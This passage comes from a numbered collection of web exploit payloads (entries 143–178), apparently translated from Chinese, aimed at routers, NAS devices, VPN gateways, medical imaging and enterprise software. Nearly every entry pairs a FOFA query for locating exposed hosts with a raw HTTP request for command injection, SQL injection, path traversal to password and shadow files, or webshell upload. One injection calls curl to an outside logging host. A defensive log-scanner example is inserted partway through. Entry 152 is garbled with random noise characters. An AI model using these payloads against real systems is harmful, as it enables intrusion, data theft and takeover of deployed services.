143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

: L# ^. z* z; M. n. S; d3 B152. Progress Kemp LoadMaster 远程命令执行* I, U9 z* P2 G+ @/ u8 |* \
CVE-2024-1212
2 u2 n) m: a, H7 I; jLoadMaster <= 7.2.59.2 (GA)
7 W* H1 A) u0 P1 }/ SLoadMaster<=7.2.54.8 (LTSF)
0 z$ `! y- ^4 x& d$ ?+ i" _* e& }& TLoadMaster <= 7.2.48.10 (LTS)) v1 r( j+ O8 `
FOFA:body="LoadMaster"5 g, u  {9 X0 W9 k, m
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
  m* L- d- [) G* J3 k0 u0 L* vGET /access/set?param=enableapi&value=1 HTTP/1.13 Q& c2 P/ x1 S
Host: x.x.x.x6 S; Z/ z1 e  O7 w" C" i/ f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
/ l8 p! G8 {3 d- |3 @& b! W) BConnection: close
$ T9 r0 t4 ?+ S8 T) g' zAccept: */*8 v/ @+ u* ~3 K
Accept-Language: en
- w) @# e7 V3 }) b/ A! ?Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
) O- @% u/ a2 b( [( wAccept-Encoding: gzip" g- T+ I! i6 @$ d. T$ _
- U( L& V4 F" D: L1 G
8 x. e( O/ m: w, [
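Detection example added by the editor (it is not part of the original post and not code from any of the products above): a small log scanner that flags the two request shapes shared by several entries in this list, namely `..` path segments that survive percent-decoding (entries 126, 129, 132 and 147) and query parameters or Basic credentials whose base64 decodes to a SQL statement or a command line (entries 122, 144 and 152). The sample log lines, client IPs and timestamps are constructed; the request targets are copied from the entries named. All function, constant and rule names are the editor's own.

```python
"""Added detection example: flag access-log requests carrying the traversal and
base64-wrapped payload patterns catalogued above. Not from the original post."""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-log-style line: client, timestamp, "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A '..' segment anywhere in a decoded path or query value (entries 126, 129, 132, 147).
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')
# Keywords seen in the decoded sql= value of entry 122 and in the injection entries.
SQL_RE = re.compile(r'\b(select|union|sleep|updatexml|extractvalue|database|version)\b', re.I)
# Command names that appear once the entry 144 system= and entry 152 Authorization values decode.
SHELL_WORDS = {"id", "ls", "cat", "whoami", "uname", "curl", "wget", "sh", "bash", "nc"}

# Constructed sample log (IPs and timestamps are made up); the request targets come
# from entries 126, 129, 122, 144 and 132 above, followed by two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2024:10:00:01 +0800] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1839
10.0.0.5 - - [01/Jun/2024:10:00:02 +0800] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jun/2024:10:00:03 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1" 200 2048
10.0.0.6 - - [01/Jun/2024:10:00:04 +0800] "GET /cgi-bin/nas_sharing.cgi?cmd=15&system=aWQ= HTTP/1.1" 200 77
10.0.0.7 - - [01/Jun/2024:10:00:05 +0800] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9001
10.0.0.8 - - [01/Jun/2024:10:00:06 +0800] "GET /static/css/app.css HTTP/1.1" 200 4096
10.0.0.8 - - [01/Jun/2024:10:00:07 +0800] "GET /api/search?q=aGVsbG8= HTTP/1.1" 200 30
"""


def has_traversal(target: str) -> bool:
    """True if the path or any query value contains a '..' segment after percent-decoding.
    Decoding twice also catches double-encoded forms such as %252e%252e."""
    parts = urlsplit(target)
    candidates = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return any(TRAVERSAL_RE.search(unquote(unquote(c))) for c in candidates)


def decode_base64(value: str) -> str | None:
    """Return the decoded text when value is well-formed base64 of printable ASCII, else None."""
    if len(value) < 4 or not re.fullmatch(r'[A-Za-z0-9+/]+={0,2}', value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode('ascii')
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify_decoded(text: str) -> str | None:
    """Label decoded text 'sql' or 'shell' when it reads like a query or a command line."""
    if SQL_RE.search(text):
        return 'sql'
    tokens = re.split(r"[\s;|&`'\"(){}:]+", text)
    if any(t in SHELL_WORDS for t in tokens):
        return 'shell'
    return None


def scan_target(target: str) -> list[tuple[str, str]]:
    """Return (rule, detail) findings for one request target (path plus query string)."""
    findings = []
    if has_traversal(target):
        findings.append(('path-traversal', unquote(target)))
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = decode_base64(value)
        kind = classify_decoded(text) if text is not None else None
        if kind:
            findings.append((f'base64-{kind}', f'{key}={text}'))
    return findings


def scan_log(log_text: str) -> list[tuple[str, str, str]]:
    """Run scan_target over every parseable log line; returns (client_ip, rule, detail)."""
    results = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule, detail in scan_target(m.group('target')):
            results.append((m.group('ip'), rule, detail))
    return results


def inspect_basic_auth(header_value: str) -> str | None:
    """Decode an 'Authorization: Basic' value and return 'sql'/'shell' when the
    credential itself carries such content, as in the entry 152 LoadMaster request."""
    scheme, _, token = header_value.strip().partition(' ')
    if scheme.lower() != 'basic':
        return None
    text = decode_base64(token.strip())
    return classify_decoded(text) if text is not None else None


if __name__ == '__main__':
    for ip, rule, detail in scan_log(SAMPLE_LOG):
        print(f'{ip:10} {rule:15} {detail}')
```

Running the file prints one line per finding (five for the constructed sample). The same checks belong in a WAF rule or a log pipeline; the double decode in has_traversal matters because front-end proxies and application servers normalise %2e and %252e differently, and the decode-then-classify step is what turns an opaque-looking parameter such as system=aWQ= into something a rule can match.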
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 (INFINITT) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close



170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

